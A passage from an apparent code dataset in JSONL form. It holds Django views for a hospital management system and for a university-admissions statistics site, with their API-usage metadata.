"line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "7451927733", "text": "from django.shortcuts import render, redirect,reverse\nfrom Department.models import Department\nfrom django.http import JsonResponse\nfrom Staff.models import Doctor\nfrom Patient.forms import *\nfrom Patient.models import *\nfrom django.core.serializers import serialize\nfrom .models import *\nimport json\n\n\n# Create your views here.\n\n\ndef appointment_view(request):\n is_ajax = request.headers.get(\"X-Requested-With\") == \"XMLHttpRequest\"\n\n if is_ajax:\n if request.method == \"POST\":\n data = json.load(request)\n dept = data.get(\"payload\")\n doctor = Doctor.objects.filter(department__name=dept[\"dept\"])\n doclist = {}\n for i, data in enumerate(doctor):\n doclist[i] = data.profile.first_name\n doclist[\"len\"] = doctor.count()\n # print(serialize(queryset=doctor, format=\"json\"))\n\n return JsonResponse(doclist)\n if request.method == \"POST\":\n doctor = request.POST.get(\"doctor\")\n doc = doctor[doctor.index(\"Dr\")+3:]\n\n Appointment.objects.create(\n date = request.POST.get(\"date\"),\n phone_number = request.POST.get(\"phone\"),\n doctor = Doctor.objects.get(profile__first_name = doc),\n time = request.POST.get(\"time\"),\n message = request.POST.get(\"message\"),\n patient = Patient.objects.get_or_create(\n profile__first_name=request.POST.get(\"name\").split(\" \")[0])\n\n )\n #print(request.POST)\n\n department = Department.objects.all()\n form = AppointmentForm2()\n\n context = {\n \"departments\": department,\n \"form\":form\n }\n return render(request, \"appointment.html\", context)\n\n\ndef confirmation_view(request):\n return render(request, \"confirmation.html\")\n\ndef patient_page(request, id):\n patient = Patient.objects.get(id=id)\n appointments = patient.get_appointment_history()\n drug_prescription_list = 
DrugPrescription.objects.filter(patient_id=patient.id)\n lab_test_list = LabTest.objects.filter(patient_id=patient.id)\n context = {\n \"patient\": patient,\n \"appointments\": appointments,\n \"labtests\": lab_test_list,\n \"drugprescriptions\": drug_prescription_list\n }\n return render(request, \"patient-page.html\", context)\n\ndef DrugPrescriptionFormView(request, id):\n patient = Patient.objects.get(id=id)\n form = DrugPrescriptionForm()\n if request.method == \"POST\":\n form = DrugPrescriptionForm(request.POST)\n if form.is_valid():\n form.instance.prescribing_doctor = Doctor.objects.get(profile=request.user)\n form.instance.patient = patient\n form.instance.save()\n return redirect(reverse(\"patient-page\", kwargs = {\"id\":id}))\n context = {\n \"form\":form,\n \"patient\":patient\n }\n return render(request,\"drug_prescription_form.html\", context )\n\ndef LabTestFormView(request, id):\n patient = Patient.objects.get(id=id)\n form = LabTestForm()\n if request.method == \"POST\":\n form = LabTestForm(request.POST)\n if form.is_valid():\n form.instance.prescribing_doctor = Doctor.objects.get(profile=request.user)\n form.instance.patient = patient\n form.instance.save()\n return redirect(reverse(\"patient-page\", kwargs = {\"id\":id}))\n context = {\n \"form\":form,\n \"patient\":patient\n }\n return render(request,\"lab_test_form.html\", context )\n\ndef EntryFormView(request, id):\n form = EntryForm()\n patient = Patient.objects.get(id=id)\n if request.method == 'POST':\n form =EntryForm(request.POST)\n if form.is_valid():\n form.instance.patient = patient\n form.instance.save()\n return redirect(patient.get_absolute_url())\n\n context = {\n \"form\":form,\n \"patient\":patient\n\n }\n return render(request, \"entryform.html\", context)\n\ndef AppointmentFormView(request,id):\n form = AppointmentForm()\n patient = Patient.objects.get(id = id)\n doctor = Doctor.objects.get(profile_id = request.user)\n if request.method == \"POST\":\n form = AppointmentForm(request.POST)\n if form.is_valid():\n form.instance.doctor = doctor\n form.instance.patient = patient\n form.instance.phone_number = patient.phone_number\n form.instance.save()\n return redirect(patient.get_absolute_url())\n\n context = {\n \"form\":form,\n \"patient\":patient,\n }\n return render(request, \"appointment-form.html\", context)\n\ndef PatientPrescriptioListView(request, id):\n patient = Patient.objects.get(id=id)\n appointments = patient.get_appointments_history()\n drug_prescription_list = DrugPrescription.objects.filter(patient_id = patient.id)\n lab_test_list = LabTest.objects.filter(patient_id = patient.id)\n context = {\n \"patient\":patient,\n \"appointments\":appointments,\n \"labtests\":lab_test_list,\n \"drugprescriptions\":drug_prescription_list\n }\n return render(request, \"all_prescription_list.html\", context)\n\n\ndef AdmissionFormView(request,id):\n form = AdmissionForm()\n patient = Patient.objects.get(id = id)\n if request.method == \"POST\":\n form = AdmissionForm(request.POST)\n if form.is_valid():\n form.instance.patient = patient\n form.instance.save()\n return redirect(patient.get_absolute_url())\n\n context = {\n \"form\":form,\n \"patient\":patient,\n }\n return render(request, \"admission-form.html\", context)\n\ndef AppointmentListView(request, id):\n patient = Patient.objects.get(id=id)\n appointments = patient.get_appointment_history()\n context = {\n 'patient':patient,\n 'appointments':appointments\n }\n return render(request, 'appointmentlist.html', context)\n\ndef 
EntryListView(request, id, slug):\n patient = Patient.objects.get(id=id)\n entry = Entry.objects.filter(patient=patient, department__slug=slug)\n context = {\n 'patient':patient,\n 'entry':entry,\n }\n return render(request, 'entrylist.html', context)\n\n\ndef PatientLabTestListView(request, id):\n patient =Patient.objects.get(id = id)\n labtest = LabTest.objects.filter(testresult__isnull = False)\n\ndef AppointmentDetailView(request, id, slug):\n appointment = Appointment.objects.get(slug=slug)\n patient = Patient.objects.get(id = id)\n drug_prescription = DrugPrescription.objects.filter(appointment=appointment)\n labtest = LabTest.objects.filter(appointment=appointment)\n entry = Entry.objects.filter(appointment=appointment)\n context ={\n 'appointment':appointment,\n \"drugprescriptions\":drug_prescription,\n \"labtests\":labtest,\n \"entries\":entry,\n \"patient\":patient\n }\n return render(request, 'appointment-detail.html', context)\n\ndef patientProfile(request, id):\n patient = Patient.objects.get(id=id)\n context = {\n \"patient\":patient\n }\n return render(request, \"patient-profile.html\", context)", "repo_name": "DrAnonymousNet/HMS", "sub_path": "Patient/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7056, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects.filter", "line_number": 22, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 22, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 29, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 37, "usage_type": "name"}, {"api_name": "Patient.forms.objects.get_or_create", "line_number": 40, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 40, "usage_type": "name"}, {"api_name": "Department.models.Department.objects.all", "line_number": 46, "usage_type": "call"}, {"api_name": "Department.models.Department.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "Department.models.Department", "line_number": 46, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 60, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 60, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 73, "usage_type": "name"}, {"api_name": "Staff.models.Doctor.objects.get", "line_number": 78, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 
78, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 86, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 89, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 89, "usage_type": "name"}, {"api_name": "Staff.models.Doctor.objects.get", "line_number": 94, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 94, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 106, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 106, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 119, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 123, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 123, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 123, "usage_type": "name"}, {"api_name": "Staff.models.Doctor.objects.get", "line_number": 124, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 124, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 132, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 138, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 141, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 141, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 151, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 156, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 156, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 162, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 168, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 171, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 171, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 177, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 180, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 180, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 186, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", 
"line_number": 190, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 190, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 190, "usage_type": "name"}, {"api_name": "Patient.forms.objects.get", "line_number": 195, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 195, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 195, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 206, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 209, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 209, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 209, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 213, "usage_type": "call"}]} +{"seq_id": "2320572583", "text": "from django.http import HttpResponse\nfrom django.db.models import Count, Sum\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\n\nfrom rest_framework import viewsets, generics, mixins\nfrom rest_framework.response import Response\n\nfrom .serializers import HighSchoolSerializer, HighSchoolWithResultsSerializer, PlanSerializer, SpecSerializer, OdcResultsBinsSerializer, GroupSerializer, SpecGroupSerializer, SearchResultSerializer, OdcResultsSerializer, ShortOdcResultsSerializer\nfrom .models import OdcInfoHighschool, OdcPlan, OdcInfoSpec, OdcInfoSpecGroup, OdcResults, OdcResultsBins, UserInfo, OdcPlanType, OdcInfoCommercialType, OdcInfoForm\nfrom .helpers import *\n\n\n# own views (not rest api)\n\n\n# index page\ndef index(request):\n ctx = {}\n return render(request, 'index.html')\n\n# one highschool page\ndef highschool(request, id):\n ctx = {}\n ctx['highschool'] = OdcInfoHighschool.objects.get(id=id)\n ctx['types'] = OdcPlanType.objects.all()\n ctx['selected_commercial_type'] = commercial = int(request.GET.get('commercial_type', 1))\n ctx['selected_plan_type'] = plan_type = int(request.GET.get('plan_type', 0))\n ctx['selected_form'] = form = int(request.GET.get('form', 1))\n\n ctx['selected_commercial_type_data'] = {}\n ctx['selected_plan_type_data'] = {}\n ctx['selected_form_data'] = {}\n\n user = request.user\n plans = OdcPlan.objects.select_related().filter(highschool_id=id)\n for plan in plans:\n ctx['selected_commercial_type_data'][plan.commercial_type.id] = plan.commercial_type\n ctx['selected_plan_type_data'][plan.plan_type.id] = plan.plan_type\n ctx['selected_form_data'][plan.form.id] = plan.form\n\n plans = plans.filter(commercial_type=commercial, plan_type=plan_type, form=form).order_by('spec_id')\n ctx['specs'] = []\n for plan in plans:\n p = {}\n p['plan'] = plan\n unit = get_user_units(request)\n p['user_points'] = count_user_points(unit, plan)\n p['all1'] = 0\n p['all2'] = 0\n p['good1'] = 0\n p['good2'] = 0\n\n results = OdcResults.objects.filter(spec_id=p['plan'].spec.id, highschool_id=id, result_type_id__in=(1,2), commercial_type=commercial, form=form)\n all_students = results.values('highschool_id', 'spec_id', 'result_type').annotate(count=Count('result_type'))\n for a in all_students:\n p['all' + str(a['result_type'])] = a['count']\n for a in all_students:\n for i in range(1,3):\n all_students = results.filter(highschool_id=id, spec_id = a['spec_id'], total__lte = p['user_points'], result_type_id=i).values_list('total')\n p['good'+str(i)] = len(all_students)\n if p['all'+str(i)] > 0:\n 
p['percent'+str(i)] = 100 * p['good'+str(i)] / p['all'+str(i)]\n else:\n p['percent'+str(i)] = 0\n\n ctx['specs'].append(p)\n\n return render(request, 'highschool.html', ctx)\n\n# search in highschools\ndef highschools_search(request):\n ctx = {}\n unit = set_user_units(request)\n\n specs = request.session['specs']\n if specs is not None and not specs == []:\n plans = OdcPlan.objects.select_related().filter(spec_id__in=specs, commercial_type=1, form=1)\n else:\n plans = OdcPlan.objects.select_related().filter(commercial_type=1, form=1)\n highschools_ids = plans.values('highschool_id').annotate(count=Count('highschool_id')).values_list('highschool_id', flat=True)\n highschools_info = OdcInfoHighschool.objects.filter(id__in=highschools_ids).values('name', 'raiting', 'id', 'website')\n if specs is None or specs == []:\n results = OdcResults.objects.filter(highschool_id__in=highschools_ids,result_type_id__in=(1,2), commercial_type=1, form=1)\n else:\n results = OdcResults.objects.filter(spec_id__in=specs, highschool_id__in=highschools_ids,result_type_id__in=(1,2), commercial_type=1, form=1)\n all_results = results.values('highschool_id', 'result_type', 'spec_id').annotate(count=Count('result_type'))\n\n final_results = {}\n points = {}\n\n for highschool in highschools_info:\n final_results[highschool['id']] = highschool\n final_results[highschool['id']]['specs'] = {}\n points = {}\n points['all1'] = 0\n points['all2'] = 0\n points['good1'] = 0\n points['good2'] = 0\n points['planned'] = 0\n points['min1'] = plans[0].min_sum_1\n points['min2'] = plans[0].min_sum_2\n final_results[highschool['id']]['points'] = points\n\n # compute the figures for the university as a whole\n for plan in plans:\n spec_points = {}\n spec_points['plan'] = plan\n spec_points['all1'] = 0\n spec_points['all2'] = 0\n spec_points['good1'] = 0\n spec_points['good2'] = 0\n spec_points['user_points'] = count_user_points(unit, plan)\n\n final_results[plan.highschool_id]['points']['planned'] += plan.planned\n if plan.min_sum_1 and plan.min_sum_1 < final_results[plan.highschool_id]['points']['min1']:\n final_results[plan.highschool_id]['points']['min1'] = plan.min_sum_1\n if plan.min_sum_2 and plan.min_sum_2 < final_results[plan.highschool_id]['points']['min2']:\n final_results[plan.highschool_id]['points']['min2'] = plan.min_sum_2\n\n for a in all_results:\n i = str(a['result_type'])\n if not a['spec_id'] == plan.spec_id or not a['highschool_id'] == plan.highschool_id:\n continue\n spec_points['all' + i] = a['count']\n final_results[plan.highschool_id]['points']['all'+i] += a['count']\n count_good = results.filter(highschool_id=plan.highschool_id, spec_id=plan.spec_id, total__lte=spec_points['user_points'], result_type_id=a['result_type']).count()\n spec_points['good' + i] = count_good\n final_results[plan.highschool_id]['points']['good'+i] += count_good\n # percentage for the speciality\n if spec_points['all'+i] > 0:\n spec_points['percent'+i] = 100 * spec_points['good'+i] / spec_points['all'+i]\n else:\n spec_points['percent'+i] = 0\n # percentage for the university as a whole\n if final_results[plan.highschool_id]['points']['all'+i] > 0:\n final_results[plan.highschool_id]['points']['percent'+i] = 100 * final_results[plan.highschool_id]['points']['good'+i] / final_results[plan.highschool_id]['points']['all'+i]\n else:\n final_results[plan.highschool_id]['points']['percent'+i] = 0\n\n # store the result\n final_results[plan.highschool_id]['specs'][plan.spec_id] = spec_points\n\n ctx['results'] = final_results\n return render(request, 
'highschools_search.html', ctx)\n\n# particular info for one spec for exact highschool\ndef plan(request, plan_id):\n ctx = {}\n unit = get_user_units(request)\n\n plan = OdcPlan.objects.select_related().get(id=plan_id)\n hs_id = plan.highschool_id\n spec_id = plan.spec_id\n highschool_info = OdcInfoHighschool.objects.get(id=hs_id)\n results = OdcResults.objects.filter(spec_id=spec_id, highschool_id=hs_id,result_type_id__in=(1,2), commercial_type=plan.commercial_type, form=plan.form)\n all_results = results.values('highschool_id', 'result_type', 'spec_id').annotate(count=Count('result_type'))\n bins = OdcResultsBins.objects.filter(highschool_id=hs_id, spec_id=spec_id).values().annotate(count=Count('spec_id'))\n\n sums = bins.values('highschool_id', 'result_type_id').annotate(\n below_150=Sum('below_150'),\n below_160=Sum('below_160'),\n below_170=Sum('below_170'),\n below_180=Sum('below_180'),\n below_190=Sum('below_190'),\n below_200=Sum('below_200'),\n below_210=Sum('below_210'),\n below_220=Sum('below_220'),\n below_230=Sum('below_230'),\n below_240=Sum('below_240'),\n below_250=Sum('below_250'),\n below_260=Sum('below_260'),\n below_270=Sum('below_270'),\n below_280=Sum('below_280'),\n below_290=Sum('below_290'),\n below_300=Sum('below_300'))\n\n ctx = {}\n ctx['highschool'] = highschool_info\n ctx['plan'] = plan\n ctx['sums'] = {}\n for sum in sums:\n ctx['sums'][sum['result_type_id']] = sum\n\n # compute the figures for the university as a whole\n spec_points = {}\n spec_points['all1'] = 0\n spec_points['all2'] = 0\n spec_points['good1'] = 0\n spec_points['good2'] = 0\n spec_points['user_points'] = count_user_points(unit, plan)\n\n for r in all_results:\n spec_points['all' + str(r['result_type'])] = r['count']\n for i in range(1,3):\n count_good = results.filter(total__lte=spec_points['user_points'], result_type_id=i).count()\n spec_points['good'+str(i)] = count_good\n # percentage for the speciality\n if spec_points['all'+str(i)] > 0:\n spec_points['percent'+str(i)] = 100 * spec_points['good'+str(i)] / spec_points['all'+str(i)]\n else:\n spec_points['percent'+str(i)] = 0\n\n # store the result\n ctx['specs'] = spec_points\n\n return render(request, 'highschools_spec.html', ctx)\n\n# page for an individual speciality\ndef spec(request, spec_id):\n ctx = {}\n ctx['spec'] = OdcInfoSpec.objects.select_related().get(id=spec_id)\n\n plans = OdcPlan.objects.select_related().filter(spec_id=spec_id).order_by('-highschool__raiting')\n ctx['highschools'] = []\n for plan in plans:\n hs = None\n for item in ctx['highschools']:\n if item['highschool'].id == plan.highschool_id:\n hs = item\n break\n if hs is None:\n hs = {'highschool': plan.highschool, 'plans': []}\n ctx['highschools'].append(hs)\n hs['plans'].append(plan)\n\n return render(request, 'spec.html', ctx)\n\n# all specialities by group on one page\ndef specs(request):\n ctx = {}\n ctx['groups'] = {}\n specs = OdcInfoSpec.objects.select_related().all()\n for spec in specs:\n ctx['groups'].setdefault(spec.group.id, {'group': spec.group, 'specs': []})\n ctx['groups'][spec.group.id]['specs'].append(spec)\n return render(request, 'specialities.html', ctx)\n\n# rating of the top 100 universities\ndef rating(request):\n ctx = {}\n ctx['highschools'] = OdcInfoHighschool.objects.order_by('-raiting')[:100]\n return render(request, 'rating.html', ctx)\n\n# add to / remove from favourites\n@login_required\ndef add_highschool(request):\n fav = request.user.user_info.getfavhs()\n id = int(request.GET['id'])\n if id in fav:\n fav.remove(id)\n else:\n fav.append(id)\n 
request.user.user_info.setfavhs(fav)\n request.user.user_info.save()\n return HttpResponse('ok')\n\n# add to / remove from favourites\n@login_required\ndef add_plan(request):\n fav = request.user.user_info.getfavpl()\n id = int(request.GET['id'])\n if id in fav:\n fav.remove(id)\n else:\n fav.append(id)\n request.user.user_info.setfavpl(fav)\n request.user.user_info.save()\n return HttpResponse('ok')\n\n# favourites page\n@require_login(url='core.views.signup')\ndef favourites(request):\n ctx = {}\n\n highschools = {}\n hs_ids = request.user.user_info.getfavhs()\n all_hs = OdcInfoHighschool.objects.filter(id__in=hs_ids).order_by('-raiting')\n\n unit = get_user_units(request)\n highschools = []\n\n for hs in all_hs:\n plans = OdcPlan.objects.filter(highschool_id=hs.id)\n results = OdcResults.objects.filter(highschool_id=hs)\n\n from django.db.models import Min, Sum\n highschool = {}\n highschool['highschool'] = hs\n highschool['all1'] = results.filter(result_type_id=1).count()\n highschool['all2'] = results.filter(result_type_id=2).count()\n highschool['good1'] = 0\n highschool['good2'] = 0\n highschool['min1'] = plans.aggregate(Min('min_sum_1'))['min_sum_1__min']\n highschool['min2'] = plans.aggregate(Min('min_sum_2'))['min_sum_2__min']\n highschool['planned'] = plans.aggregate(Sum('planned'))['planned__sum']\n\n for plan in plans:\n user_points = count_user_points(unit, plan)\n\n for i in range(1,3):\n highschool['good' + str(i)] += results.filter(spec_id=plan.spec_id, result_type_id=i, total__lte=user_points, commercial_type=plan.commercial_type_id, form=plan.form).count()\n\n # percentage for the university as a whole\n for i in range(1,3):\n if highschool['all'+str(i)] > 0:\n highschool['percent'+str(i)] = 100 * highschool['good'+str(i)] / highschool['all'+str(i)]\n else:\n highschool['percent'+str(i)] = 0\n\n # store the result\n highschools.append(highschool)\n ctx['highschools'] = highschools\n\n pl_ids = request.user.user_info.getfavpl()\n plans = []\n for pl_id in pl_ids:\n pl = OdcPlan.objects.select_related().get(id=pl_id)\n results = OdcResults.objects.filter(highschool_id=pl.highschool_id, spec_id=pl.spec_id)\n\n plan = {}\n plan['plan'] = pl\n plan['all1'] = 0\n plan['all2'] = 0\n plan['good1'] = 0\n plan['good2'] = 0\n plan['user_points'] = count_user_points(unit, pl)\n\n for i in range(1,3):\n plan['all' + str(i)] = results.filter(result_type_id=i).count()\n plan['good'+str(i)] = results.filter(total__lte=plan['user_points'], result_type_id=i).count()\n # percentage for the speciality\n if plan['all'+str(i)] > 0:\n plan['percent'+str(i)] = 100 * plan['good'+str(i)] / plan['all'+str(i)]\n else:\n plan['percent'+str(i)] = 0\n\n # store the result\n plans.append(plan)\n ctx['plans'] = plans\n\n return render(request, 'favourites.html', ctx)\n\n# function for internal use\n@login_required\ndef debug(request):\n ctx = {}\n return HttpResponse('ok')\n\n # assume the number of places equals the total number of students admitted in the first and second waves\n # plans = OdcPlan.objects.all()\n # for plan in plans:\n # res = OdcResults.objects.filter(spec_id=plan.spec_id, highschool_id=plan.highschool_id, result_type_id__in=(1,2), commercial_type=plan.commercial_type_id, form=plan.form).count()\n # plan.planned = res\n # plan.save()\n\n # clear the university ratings, then fill them with fresh data\n # points = {161:4.179, 165:4.151, 147:4.056, 901:4.038, 296:3.922, 313:3.749, 294:3.510, 1507:3.499, 219:3.426, 59:3.425, 1519:3.419, 177:3.289, 222:3.237, 234:3.074, 209:3.068, 247:2.812, 251:2.774, 
131:2.734, 337:2.726, 170:2.511, 212:2.481, 295:2.420, 130:2.388, 1520:2.378, 45:2.364, 301:2.307, 213:2.301, 148:2.274, 223:2.272, 310:2.265, 319:2.171, 336:2.164, 60:2.117, 199:2.101, 197:2.093, 252:2.086, 4:2.049, 1527:2.037, 129:2.028, 144:2.008, 16:2.005, 132:1.965, 253:1.960, 127:1.897, 169:1.889, 3:1.887, 79:1.887, 236:1.872, 36:1.868, 17:1.841, 160:1.791, 258:1.787, 243:1.762, 271:1.746, 217:1.739, 293:1.735, 183:1.725, 302:1.718, 113:1.684, 242:1.641, 1544:1.618, 85:1.609, 108:1.606}\n # highschools = OdcInfoHighschool.objects.all()\n # for hs in highschools:\n # hs.raiting = None\n # hs.save()\n # highschools = OdcInfoHighschool.objects.filter(id__in = points.keys())\n # for hs in highschools:\n # hs.raiting = points[hs.id]\n # hs.save()\n\n # ctx['test'] = [str(hs.id) + '|' + hs.website for hs in OdcInfoHighschool.objects.all()]\n\n return render(request, 'highschools_search.html', ctx)\n\n\n# rest api\n\n# highschools\n\nclass HighSchoolsViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoHighschool.objects.all()\n serializer_class = HighSchoolSerializer\n\nclass HighSchoolsWithResultsViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoHighschool.objects.all().prefetch_related('results')\n serializer_class = HighSchoolWithResultsSerializer\n\nclass HighSchoolsWithResultsBySpecView(generics.ListAPIView):\n serializer_class = ShortOdcResultsSerializer\n pagination_class = None\n\n def get_queryset(self):\n highschool_id = self.kwargs['highschool_id']\n spec_id = self.kwargs['spec_id']\n queryset = OdcResults.objects.filter(highschool_id=highschool_id, spec_id=spec_id).select_related()\n return queryset\n\n def list(self, request, *args, **kwargs):\n self.object_list = self.filter_queryset(self.get_queryset())\n serializer = self.get_serializer(self.object_list, many=True)\n results = {}\n for item in serializer.data:\n if not item['result_type'] in results.keys():\n results[item['result_type']] = []\n results[item['result_type']].append(item['total'])\n return Response({'results': results})\n\n\n# specs and groups\n\nclass SpecViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoSpec.objects.all()\n serializer_class = SpecSerializer\n pagination_class = None\n\nclass SpecGroupViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoSpecGroup.objects.all().prefetch_related('specs')\n serializer_class = SpecGroupSerializer\n pagination_class = None\n\nclass GroupViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoSpecGroup.objects.all()\n serializer_class = GroupSerializer\n pagination_class = None\n\n\n# results\n\nclass OdcResultsViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcResults.objects.all()\n serializer_class = OdcResultsSerializer\n\nclass OdcResultsBySpecViewSet(generics.ListAPIView):\n queryset = OdcResults.objects.all()\n serializer_class = OdcResultsSerializer\n\n def get_queryset(self):\n spec_id = self.kwargs['spec_id']\n queryset = OdcResults.objects.filter(spec_id=spec_id)\n return queryset\n\n\n# others\n\nclass PlanSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcPlan.objects.all()\n serializer_class = PlanSerializer\n\nclass PlansByGroupList(generics.ListAPIView):\n serializer_class = PlanSerializer\n\n def get_queryset(self):\n group_id = self.kwargs['group_id']\n group_set = OdcInfoSpec.objects.filter(group_id=group_id).values_list('id', flat=True)\n return OdcPlan.objects.filter(spec_id__in=group_set)\n\nclass PlansBySpecList(generics.ListAPIView):\n serializer_class = PlanSerializer\n\n def get_queryset(self):\n 
